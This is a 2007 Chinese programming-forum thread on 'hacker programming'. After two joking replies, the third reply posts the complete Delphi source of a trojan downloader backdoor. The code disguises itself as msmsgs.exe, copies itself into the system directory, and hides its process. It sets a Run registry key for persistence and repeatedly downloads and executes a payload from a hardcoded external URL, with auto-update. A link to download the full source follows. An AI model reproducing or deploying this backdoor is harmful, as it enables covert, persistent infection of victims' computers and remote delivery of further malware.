主题:黑客编程讨论
worm.
[专家分:180] 发布于 2007-05-31 12:10:00
讨论一下黑客编程吧!
[em2]
回复列表 (共3个回复)
沙发
熙来熙去 [专家分:0] 发布于 2007-06-02 17:25:00
你自己开个头阿?
板凳
wpy020327 [专家分:0] 发布于 2007-06-11 10:07:00
穿黑衣,戴黑帽,
黑手套,黑袜子,
怀揣黑心一大颗。
3 楼
440105 [专家分:30] 发布于 2007-06-11 20:36:00
看黑客们写后门写地那么起劲,我也来爽一把。过过黑客瘾
小菜后门,随便写写玩的。
Program Houmen;
{
冰剑骇客程序下载后门
BinJian Downloader
versoin 1.4
作者:冰剑
警告:后门程序仅做研究,任何形式的利用,都将承担不可估量的法律刑事责任。
-----------------------------------
by BinJian at 2007.3.25 PM 19:29
[versoin 1.0]
最初雏形核心 BinJian Cracker Download Shell (BCDS)
[versoin 1.1]
特点:复制自身 进程隐藏 自启动运行
作用:从指定网站上(URL)下载 Cracker(木马病毒或恶意程序)
[versoin 1.2] 2007.2.15 AM 12:38
1.改进自我保护模块的自启动部分。
2.增加监视注册表功能。
3.增加隐藏模式,解决在由于伪装错误窗口模块而引起的Windows启动时易暴露后门目标的问题。
(403KB) us UPX 2.01 (164KB)
[versoin 1.3] 2007.3.1 PM 16:45
1.核心代码完全重写,重写至 at Win32 控制台(CONSOLE) 环境。
2.剔除隐藏模式,剔除伪装错误窗口模块。
3.采用全新的后门程序结构(Win32 CONSOLE),以及第二项的改进,
完全解决了在Windows启动时易暴露后门目标的问题。
4.剔除部分程序代码,程序执行效率增强,精简后门程序体积。
(89KB) us UPX 2.01 (40.5KB)
[varsoin 1.4] 2007.3.25 PM 19:29
1.隔秒检查模块优化,增加时间间隔。
2.改进后门核心,增加Updata功能模块,当检测到本地文件版本与远程文件版本不符时,自动更新。
注:1.4于1.3以及之前版本服务端配置结构不兼容,1.4版本需要单独配置远程版本文件,
否则可能导致无法正常使用Updata模块,或者工作不正常。
(91.5KB) us UPX 2.01 (41KB)
~~~~~~
by BinJian (c)2007-2046 Delphi 7 Bulid 4.453 + Windows XP SP2 Build 2600
}
uses
SysUtils,Windows,Urlmon,Registry,HideProcess;
const
Url='http://ati.tw.cn/1.exe'; {cracker 程序列表下载地址 URL}
CrackerFileName='wupdmgrs.exe'; {下载的 cracker 更名地址}
ProgramName='msmsgs.exe'; {伪装程序名}
RegKeyName='msmsgs'; {启动项名称}
CrackerVerFile='http://ati.tw.cn/ver.txt'; {远程版本文件}
CrackerVerBDFile='ver.txt'; {本地版本文件} {去系统目录}
BCrackerVerBDFile='ver2.txt'; {临时版本文件} {去系统目录}
t=2000; {每各t秒,检查自启动项和cracker}
var
SystemPathName,CrackerPathName,ProgramPathName,TBCrackerVerBDFile,TCrackerVerBDFile:string;
{------------------------------------------------------------------------------}
Function GetWinDir:String; {取得 Windows/System32 系统路径}
var
Buf:array[0..MAX_PATH]of char;
begin
GetSystemDirectory(Buf,MAX_PATH);
Result:=Buf;
if Result[Length(Result)]<>'\' then Result:=Result+'\';
end;
Function Readint(S:String):Longint; {读取版本文件中的数值}
Var
F:text;
P:Longint;
begin
if FileExists(S) then
begin
assignfile(F,S);
reset(F);
read(F,P);
closefile(F);
result:=P;
end;
end;
procedure Download; {下载木马} {核心模块}
begin
URLDownloadToFile(nil,pchar(TCrackerVerBDFile),pchar(TBCrackerVerBDFile),0,nil);
if (Readint(TCrackerVerBDFile)<>Readint(TBCrackerVerBDFile))
or(FileExists(CrackerPathName)=False)
then URLDownloadToFile(nil,url,pchar(CrackerPathName),0,nil);
if FileExists(CrackerPathName) then
WinExec(pchar(CrackerPathName),Sw_Show); {运行}
end;
{自我保护模块.Begin}
procedure RegKey; {开机自动运行}
var
Reg:TRegistry;
begin
Reg:=TRegistry.Create;
Reg.RootKey:=HKEY_LOCAL_MACHINE;
Reg.OpenKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run',true);
if Reg.ValueExists(RegKeyName)=False then {如果键 RegKeyName 不存在 则添加}
Reg.WriteString(RegKeyName,ProgramPathName);
Reg.CloseKey;
Reg.Free;
end;
procedure CopyMe; {复制自身}
begin
SystemPathName:=GetWinDir+ProgramName; {获得自我复制的路径(SystemPathName)}
if (ProgramPathName<>SystemPathName)and(Fileexists(SystemPathName)=False) then {比较当前目录是否与SystemPathName相同,并且SystemPathName下的自身不存在}
begin {如果不是,则自我复制到 SystemPathName 并运行}
Copyfile(Pchar(ProgramPathName),Pchar(SystemPathName),False);
Winexec(Pchar(SystemPathName),Sw_show);
Halt;
end;
if (Fileexists(SystemPathName)=False) then Halt;
end;
procedure Inspection; {每隔t秒检查 Cracker 程序,保证其完整性}
begin
Repeat
Sleep(t*1000); { 转换T为毫秒 毫秒*1000=秒 }
RegKey;
Download;
Until 1=2;
end;
{自我保护模块.End}
begin
MyHideProcess; {自我保护功能,进程插入模块启动}
ProgramPathName:=ParamStr(0); {获得程序当前路径}
CrackerPathName:=GetWinDir+CrackerFileName; {获得CrackerPathName 的路径 CrackerFileName}
TBCrackerVerBDFile:=GetWinDir+BCrackerVerBDFile; {获得BCrackerVerBDFile 的路径 TBCrackerVerBDFile)}
TCrackerVerBDFile:=GetWinDir+CrackerVerBDFile; {获得CrackerVerBDFile 的路径 TCrackerVerBDFile}
Download; {启动下载核心模块}
CopyMe; {判断程序是否在系统目录,如果不是自我复制}
RegKey; {注册自启动注册表}
Inspection; {开始循环模式}
end.
完全源代码下载,编译后40KB.
http://www.cnare.cn/blog/article.asp?id=4
我来回复